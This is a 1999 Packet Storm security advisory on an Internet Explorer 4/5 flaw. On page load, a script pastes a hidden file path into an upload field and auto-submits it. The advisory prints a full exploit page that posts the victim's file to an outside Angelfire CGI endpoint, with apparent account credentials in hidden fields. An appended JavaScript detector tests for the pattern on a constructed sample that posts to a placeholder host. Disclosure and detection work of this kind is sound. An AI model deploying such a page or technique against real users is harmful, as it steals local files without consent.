
cuartango-msie.txt

17 Aug 1999. Reported by Packet Storm. Type: packetstorm. Source: packetstormsecurity.com

Security hole in Microsoft Internet Explorer allows file transfer to malicious sites via scripting.

Code
`Cuartango security Hole   
  
http://pages.whowhere.com/computers/cuartangojc/cuartangoh1.html  
  
Affected software  
Microsoft Internet Explorer 4  
Microsoft Internet Explorer 5 Preview  
  
Risks  
Major : Your computer files can be sent to a WEB site by a malicious Script (if the file name is known).  
  
Technical description  
There is an input form field used to transfer files from the browsing computer to a WEB site. This  
input field is HTML coded as :  
  
<input type="file" name="filename" size="30">  
  
Theoretically this input field can be filled only by the user by clicking a "Browse" button or  
typing the file name.  
In order to avoid a security hole, scripts are not allowed to modify the value of this input   
field; the statement below will not work (very clever MS Explorer programmers) :  
  
document.forms[0].filename = "C:\config.sys";  
  
What Microsoft programmers forgot is that "copy" and "paste" commands are possible in scripting with  
Internet Explorer 4 and they did not protect the file input field against this operation.  
The attack is then evident :  
1- Create a second form with a hidden field named "T1" containing the file name you want to hack.  
2- In the HTML body onload event, fire a script :  
  
<body onload="getfile()">  
  
function getfile()  
{  
document.forms[1].T1.select();  
document.execCommand("copy");  
document.forms[0].filename.select();  
document.execCommand("paste");  
document.forms[0].submit();  
}  
  
The result is that the file is POSTED to the malicious WEB site defined in the form action property.  
  
  
----------exploit code example----------  
  
<html>  
<script language="JavaScript">  
  
function getfile()  
{  
document.forms[1].T1.select();  
document.execCommand("copy");  
document.forms[0].filename.select();  
document.execCommand("paste");  
window.open("cuartangoh3.html");  
document.forms[0].submit();  
}  
  
</script>  
  
  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">  
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">  
<title>Cuartango Hole 2</title>  
</head>  
  
<body onload="getfile()">  
  
<form enctype="multipart/form-data" method="post"  
action="http://www.angelfire.com/cgi-bin/bedit">  
<input type="hidden" name="storage" value="ab"><input type="hidden" name="hpd"  
value="cuartangojc"><input type="hidden" name="password" value="asisea"><p><strong>I am  
transfering your file</strong> <input type="file" name="filename" size="30"> <strong>to my  
web site </strong>&nbsp; </p>  
</form>  
  
<form method="POST">  
<input type="hidden" name="T1" value="/test.txt"><p>&nbsp;</p>  
</form>  
  
</body>  
</html>  
  
`
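
The technique described above needs three ingredients on one page: a file input, a script-driven paste, and a script-driven submit. The following static check for that combination is an added example, not part of the original advisory; `scanPage`, `attrs` and both sample pages are constructed for illustration, and the form target is a placeholder.

```javascript
// Added example: static heuristic for the scripted copy/paste upload pattern.
// scanPage, attrs and both sample pages are constructed, not from the advisory.

// Parse the attributes of one HTML tag into a map with lower-cased names.
function attrs(tag) {
  const out = {};
  for (const m of tag.matchAll(/([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g)) {
    out[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return out;
}

// Report which ingredients of the technique a page contains.
function scanPage(html) {
  const tags = (name) => (html.match(new RegExp(`<${name}\\b[^>]*>`, 'gi')) || []).map(attrs);
  const commands = [...html.matchAll(/execCommand\s*\(\s*["'](\w+)["']/gi)]
    .map((m) => m[1].toLowerCase());
  const result = {
    fileInput: tags('input').some((a) => (a.type || '').toLowerCase() === 'file'),
    scriptedPaste: commands.includes('paste'),
    scriptedSubmit: /\.submit\s*\(\s*\)/.test(html),
    runsOnLoad: tags('body').some((a) => 'onload' in a),
    postTargets: tags('form').map((a) => a.action).filter(Boolean),
  };
  // A file field plus script-driven paste and submit needs no user action.
  result.suspicious = result.fileInput && result.scriptedPaste && result.scriptedSubmit;
  return result;
}

// Constructed sample: same structure as the advisory's page, placeholder target.
const samplePattern = `
<body onload="getfile()"><script>
function getfile() {
  document.forms[1].T1.select(); document.execCommand("copy");
  document.forms[0].filename.select(); document.execCommand("paste");
  document.forms[0].submit();
}</script>
<form enctype="multipart/form-data" method="post" action="http://collector.example/upload">
<input type="file" name="filename"></form>
<form method="POST"><input type="hidden" name="T1" value="/test.txt"></form></body>`;

// Constructed sample: an ordinary upload form that the user fills and submits.
const sampleBenign = `<body><form enctype="multipart/form-data" method="post" action="/upload">
<input type="file" name="attachment"> <input type="submit" value="Send"></form></body>`;

console.log(scanPage(samplePattern), scanPage(sampleBenign));
```

The check is plain string matching, so it only flags pages that spell out these calls literally; `postTargets` lists where a flagged form would send the file.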
